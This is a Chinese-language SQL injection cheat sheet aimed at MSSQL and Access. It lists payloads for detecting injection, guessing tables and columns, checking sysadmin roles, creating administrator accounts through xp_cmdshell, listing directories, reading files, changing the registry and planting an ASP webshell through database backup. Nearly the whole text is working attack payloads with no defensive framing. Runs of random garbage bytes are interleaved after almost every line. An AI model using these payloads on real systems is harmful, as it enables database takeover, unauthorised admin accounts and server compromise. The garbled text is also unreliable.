1.判断是否有注入;and 1=1 ;and 1=2 �\�)�d��p�
2.初步判断是否是mssql ;and user>0 :�z8/�iD y
tCr�E�cjT-
3.注入参数是字符'and [查询条件] and ''=' 0Y�e�/����
0hoMf=bb$�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' {LiJ�=Ebt�
��1�vo3aF
5.判断数据库系统 (n��� k��g
T�g^8a,�Lt
;and (select count(*) from sysobjects)>0 mssql 9\Gk)0����
eI�
( �S)q
;and (select count(*) from msysobjects)>0 access T)e2IXGN
fc~fjtqwvz
�D�]E�=0+�
��H}r��]j\
6.猜数据库 ;and (select Count(*) from [数据库名])>0 h�>�bj���G
�&Z~�_��BT
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 d[?RL&hJ�O
4v�L\t
uoz
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 2�@M�pWj4�
rS>.!DiYr,
9.(1)猜字段的ascii值(access) "1gIR^S%�9
s�#5#WNzP�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ��^!B]V>L-
diNSF-wi,,
(2)猜字段的ascii值(mssql) V�<W�Wtu;3
p|gVIsg[-e
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 C1{Q� 4(K%
"S#$:9�2�
10.测试权限结构(mssql) |v�d|;�" `
\�Yj_U'2"i
�cy@oAoB�q
)$p3�6dWl�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �3_@I�E2dA
?�xw�i2<zz
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �y"�H5�>�
.*�N�,x(V�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- N�$�>�Ml!J
ul��ALGzPh
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- J �<z�
^�C
VJ#y�s�_�W
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ]A[}�:E 5}
�M+")*�Opq
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ozsd6&�z5l
r �} �Wd�j
;and 1=(select IS_MEMBER('db_owner'));-- cl`k��d)"v
NdJ]\>5oN,
\�
3E��%6L
;LgMi5�dN
11.添加mssql和系统的帐户 T�^�eD��
yE
N3/-�S+
;exec master.dbo.sp_addlogin username;-- ,sj(�g�/hg
;exec master.dbo.sp_password null,username,password;-- c�
k[uvH
�
)P��R`irw�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 1?�)h�-aN
%ly&~�&��0
;exec master.dbo.xp_cmdshell 'net user username password
��bo/U5p�
rui� 8�x4c
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- BT(�e�U*m-
:JB�t�qpo2
;exec master.dbo.xp_cmdshell 'net user username password /add';-- M��A{ZmPm)
[|$C�2Dhw=
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- DPY+{5�q�2
�u�g}u>vQ>
�I�HW s<U�
�[6K[P3UZx
12.(1)遍历目录 4NRj�>��y�
E��
@r� &K
;create table dirs(paths varchar(100), id int) !|9�@f$�Jv
0�xi2VN"X
;insert dirs exec master.dbo.xp_dirtree 'c:\' xX%{��i�0E
I�RLA��sb3
;and (select top 1 paths from dirs)>0 @sa_/L�H!K
Ty��O�]|Q5
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) iPCn-DoIS
'xuxM�av6m
�,V!�Wo�4M
�F�+�5
5p8
(2)遍历目录 �d?5oJ�'JU
2� �.Xx)(>
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ;��|\j][�A
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 P��Qi�(O�c
V,�Bol(wY
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 a-#$T)mmfj
bOYM-\
{y�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 dM}c-=w��`
�u=PLjrB~}
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �L8E�4|F�}
>`�WQxk�py
$2���]�>{g
t0<RtIh9e�
13.mssql中的存储过程 >t�9�D��I�
4<<eqx�I$|
xp_regenumvalues 注册表根键, 子键 W�f��?[GO�
�?W dY{;&�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 KWYjN
�h#*
?�;w`hA3ei
xp_regread 根键,子键,键值名 \u6�.*w5TI
���q(46v`u
;exec xp_regread ���
^�0{�t
�Kl�?��C�[
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 WOgkv(5KN
A]%*�ye"NT
xp_regwrite 根键,子键, 值名, 值类型, 值 P�Xl%"O%d
1D�1kjM^Bo
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ?]*"S{Cq�v
l�t'N{LFvc
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 LGt�w4'y�r
]w�*�`���}
xp_regdeletevalue 根键,子键,值名 a_VWgPVdDS
@G>e����Cj
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 B)d 4]]4\\
�"Qc4v@~)�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ��4K����~>
$BLd>gTzmv
/&qE,>hd.+
�giIPK&���
14.mssql的backup创建webshell wKp�D+��+k
@}r
s�6� G
use model Nw�,|4��S�
p")"t`k��7
create table cmd(str image); i6FJG��\d�
�/A�w@2�6�
insert into cmd(str) values (''); =yR��v��*C
U�0��W�2��
backup database model to disk='c:\l.asp'; S6JWsi4C:,
��#
dUi['
Q"!��GdKM�
71IM`eL=ED
15.mssql内置函数 �^Iv�Q�dVB
Yp��3�y�%n
;and (select @@version)>0 获得Windows的版本号 y(a>Y! dgU
L[5U(��`q[
;and user_name()='dbo' 判断当前系统的连接用户是不是sa s�A+K?_���
�Aj/E��aIq
;and (select user_name())>0 爆当前系统的连接用户 `Um�-Y�'KE
�?{L��'d��
;and (select db_name())>0 得到当前连接的数据库 �))X"bFP!3
���A&c�euu
Pg�P\�v�-.
m���.�gv�?
16.简洁的webshell 1�'\���s7P
|g�!$TUS�.
use model �>%N,F`�^3
=R��M]/O9�
create table cmd(str image); k5}Qx��'/l
]X�X>��h~0
insert into cmd(str) values (''); mtLiS3Nk�8
Hkf]=k�Py*
backup database model to disk='g:\wwwtest\l.asp';
